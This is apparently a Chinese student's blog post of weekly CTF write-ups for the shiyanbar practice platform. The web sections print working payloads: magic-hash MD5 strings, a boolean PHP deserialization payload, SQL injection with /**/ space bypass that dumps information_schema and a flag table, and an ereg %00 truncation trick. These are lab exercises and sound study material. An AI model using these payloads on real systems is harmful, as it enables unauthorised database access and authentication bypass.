Secat's Blog

学习·记录

这世界变化快的真是铃儿响叮当


第二十三周总结

7.24

0x00 天网管理系统

http://www.shiyanbar.com/ctf/1810

查看网页源代码,发现一行代码: <!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->

意思为要用户名传入一组字符串后md5加密后等于0;

== : 比较运算符号,不会检查条件式的表达式的类型。在使用 == 运算符对两个字符串进行松散比较时,php会把类数值的字符串转换成数值进行比较,如果参数是字符串,则返回字符串中第一个不是数字所代表的整数值。比如:’3’ == ‘3ascasd’结果为true。

===:恒等计算符 , 同时检查表达式的值与类型。(会检查表达式类型,如bool)

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0 由上可知,代码中所给的是”==”,所以是php弱类型松散比较。因此要找到一个字符串经md5加密后开头为0,百度得到以下字符串:

QNKCDZO
0e830400451993494058024219903391
  
s878926199a
0e545993274517709034328855841020
  
s155964671a
0e342768416822451524974117254469
  
s214587387a
0e848240448830537924465865611904

将得到的符合上述要求的字符串作为username提交得到以下地址:

/user.php?fame=hjkleffifer

访问后显示:

$unserialize_str = $_POST['password'];
 $data_unserialize = unserialize($unserialize_str); 
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') 
{ print_r($flag); } 
伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年  代码意思是把post提交的password值经过“反序列化”得到一个数组,要求数组里的user和pass都等于某个值时就打印flag。且bool类型的true跟任意字符串可以弱类型相等。所以可以构造bool类型的序列化数据,使无论比较的值是什么,结果都为true。

数组(array)通常被序列化为:
a:<n>:{<key 1><value 1><key 2><value 2>...<key n><value n>}
其中<n> 表示数组元素的个数,<key 1>、<key 2>……<key n> 表示数组下标,<value 1>、<value
2>……<value n> 表示与下标相对应的数组元素的值。
  
string 型数据(字符串)被序列化为:
s:<length>:"<value>";
其中<length> 是<value> 的长度,<length> 是非负整数,数字前可以带有正号(+)。<value> 为字
符串值,这里的每个字符都是单字节字符,其范围与ASCII 码的0 - 255 的字符相对应。

boolean 型数据被序列化为:
b:<digit>;
其中<digit> 为0 或1,当boolean 型数据为false 时,<digit> 为0,否则为1。

由上构造password值:

a:2:{s:4:"pass";b:1;s:4:"user";b:1;}

资料链接: http://www.cnblogs.com/Primzahl/p/6018158.html http://www.cnblogs.com/ssooking/p/5877086.html

0x01 拐弯抹角

http://www.shiyanbar.com/ctf/1846

打开题目看到满屏的代码… <?php // code by SEC@USTC

echo '<html><head><meta http-equiv="charset" content="gbk"></head><body>';

$URL = $_SERVER['REQUEST_URI'];
//echo 'URL: '.$URL.'<br/>';
$flag = "CTF{???}";

$code = str_replace($flag, 'CTF{???}', file_get_contents('./index.php'));
$stop = 0;

这道题目本身也有教学的目的.

第一,我们可以构造 /indirection/a/../ /indirection/./ 等等这一类的

所以,第一个要求就是不得出现 ./

if($flag && strpos($URL, './') !== FALSE){
$flag = "";
$stop = 1;//Pass
} 

第二,我们可以构造 \ 来代替被过滤的 / 所以,第二个要求就是不得出现 ../

if($flag && strpos($URL, '\\') !== FALSE){
$flag = "";
$stop = 2;//Pass
} 

第三,有的系统大小写通用,例如 indirectioN/

你也可以用?和#等等的字符绕过,这需要统一解决

所以,第三个要求对可以用的字符做了限制,a-z / 和 .

$matches = array();
preg_match('/^([0-9a-z\/.]+)$/', $URL, $matches);
if($flag && empty($matches) || $matches[1] != $URL){
$flag = "";
$stop = 3;//Pass
}  第四,多个 / 也是可以的

所以,第四个要求是不得出现 //

if($flag && strpos($URL, '//') !== FALSE){
$flag = "";
$stop = 4;//Pass
} 

第五,显然加上index.php或者减去index.php都是可以的

所以我们下一个要求就是必须包含/index.php,并且以此结尾

if($flag && substr($URL, -10) !== '/index.php'){
$flag = "";
$stop = 5;//Pass
} 

第六,我们知道在index.php后面加.也是可以的 所以我们禁止p后面出现.这个符号

if($flag && strpos($URL, 'p.') !== FALSE){
$flag = "";
$stop = 6;//Pass
} 

第七,现在是最关键的时刻

你的$URL必须与/indirection/index.php有所不同

if($flag && $URL == '/indirection/index.php'){
$flag = "";
$stop = 7;//Pass
}  .

if(!$stop) $stop = 8;

echo 'Flag: '.$flag;
echo '<hr />';
for($i = 1; $i < $stop; $i++)
$code = str_replace('//Pass '.$i, '//Pass', $code);
for(; $i < 8; $i++)
$code = str_replace('//Pass '.$i, '//Not Pass', $code);


echo highlight_string($code, TRUE);

echo '</body></html>';

尝试了一些构造之后突然想加个index.php试试,结果直接出来flag,懵了…肯定是题目有bug吧…先记着,等等以后再看看

0x02 神秘字母

这个题也是看了前辈的wp才知道脑路的。先求出所给矩阵的逆矩阵

 1 0
-2 1  再将所给字母串分成9*2的矩阵,与前一个逆矩阵相乘,所得再将所的答案中的字母a~b换成相应的1~26再计算结果,且周期=26,最终计算结果应在1~26之间,再对应相应的字母,get flag。 *flag: simCTF{hillisxxxxxxxx}

7.25

0x00 简单的sql注入之2

http://ctf5.shiyanbar.com/web/index_2.php

0x00 判断是否有注入漏洞
http://ctf5.shiyanbar.com/web/index_2.php?id=1' 回显:

You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 ##### 0x01 判断是否过滤空格
http://ctf5.shiyanbar.com/web/index_2.php?id=1'and'1'='1 回显显示过滤空格:

ID: 1'and'1'='1
name: baloteli 那么可以用/**/代替空格绕过。 ##### 0x00 构造语句查询有哪些数据库:

http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

回显:

ID: 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
name: baloteli

ID: 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
name: information_schema

ID: 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
name: test

ID: 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
name: web1
0x01 查看有哪些数据表:
http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1 回显:

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: baloteli

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: CHARACTER_SETS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: COLLATIONS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: COLLATION_CHARACTER_SET_APPLICABILITY

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: COLUMNS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: COLUMN_PRIVILEGES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: ENGINES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: EVENTS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: FILES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: GLOBAL_STATUS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: GLOBAL_VARIABLES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: KEY_COLUMN_USAGE

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: PARAMETERS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: PARTITIONS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: PLUGINS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: PROCESSLIST

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: PROFILING

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: REFERENTIAL_CONSTRAINTS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: ROUTINES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: SCHEMATA

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: SCHEMA_PRIVILEGES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: SESSION_STATUS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: SESSION_VARIABLES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: STATISTICS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: TABLES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: TABLESPACES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: TABLE_CONSTRAINTS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: TABLE_PRIVILEGES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: TRIGGERS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: USER_PRIVILEGES

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: VIEWS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_BUFFER_PAGE

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_TRX

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_BUFFER_POOL_STATS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_LOCK_WAITS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_CMPMEM

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_CMP

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_LOCKS

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_CMPMEM_RESET

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_CMP_RESET

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: INNODB_BUFFER_PAGE_LRU

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: admin

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: flag

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: web_1
0x01 在倒数第二个表名中看到了flag,于是尝试查询flag。
http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/flag/**/from/**/flag.flag/**/where/**/'1'='1 回显:

SELECT command denied to user 'web1'@'localhost' for table 'flag'
0x02 再次构造,将表换为回显中提到的web1
http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1 回显:

ID: 1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
name: baloteli

ID: 1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}

7.28

0x00 哆啦A梦_Stega

打开链接后发现给了一张图片,按照常规思路用stegsolve打开查看经常藏flag的数据区,然而什么都没有发现。拖进kali,执行命令:

root@kali:~/CTF/Shiyanbar# binwalk ameng.jpg -e

DECIMAL   HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
88665 0x15A59 JPEG image data, JFIF standard 1.01

output出两张图片,其中一张就是flag

0x01 紧急报文_Misc

题目 解密一下这份截获的密文吧,时间就是机会!

FA XX DD AG FF XG FD XG DD DG GA XF FA

flag格式:flag_Xd{hSh_ctf:**}

首先,这是一道古典密码题,ADFGX第一步的解密。 下面给出加密表:

    A  D  F  G   X 
A | p  h  q  g   m 
D | e  a  y  n   o 
F | f  d  x  k   r
G | c  v  s  z   w 
X | b  u  t  i/j l 对照上表可知:

FA - f
XX - l
DD - a
AG - g
FF - x
XG - i/j
FD - d
XG - i/j
DD - a
DG - n
GA - c
XF - t
FA - f *号部分为flagxidianctf (一开始找错密码表了所以怎么做都得不到flag,貌似这种密码密码表不止一个,有机会深入了解~)

7.30

0x00 spaceport-map[安全杂项]

http://www.shiyanbar.com/ctf/1985 下载之后是一张gif逐张查看,有一张下面写着key:xxxxxx,把key中内容直接填进去后不对,然后去掉最后面的标点,对了。真水,真坑,答对率还那么低。

0x01 pilot_image[安全杂项]

http://www.shiyanbar.com/ctf/1984 这个题更水啊…用winhex打开,搜一下“pass”就出结果了==、

0x02 Once More[web]

http://www.shiyanbar.com/ctf/1805 看题目貌似是个代码审计的题,打开后查看源代码如下:

<?php
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
{
	echo '<p>You password must be alphanumeric</p>';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
	if (strpos ($_GET['password'], '*-*') !== FALSE)
	{
		die('Flag: ' . $flag);
	}
	else
	{
		echo('<p>*-* have not been found</p>');
	}
}
else
{
	echo '<p>Invalid password</p>';
}
}
?>

也就是说password需要满足以下条件:

1.由数字和字母构成

2.密码长度不超过8位

3.大小大于9999999

4.包含 -

可见第一条和第四条冲突了,所以此处运用到了ereg()的漏洞——%00截断,ereg()匹配到%00就截止了,所以会认为提交字符串合法,strpos()的要求也就满足了。

构造以下payload:

http://ctf5.shiyanbar.com/web/more.php?password=1e9%00*-* getflag

(但是不知道为什么在password框里输入就不出flag)

先写这些吧..电脑没电了…

THANKS

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码支持

^_^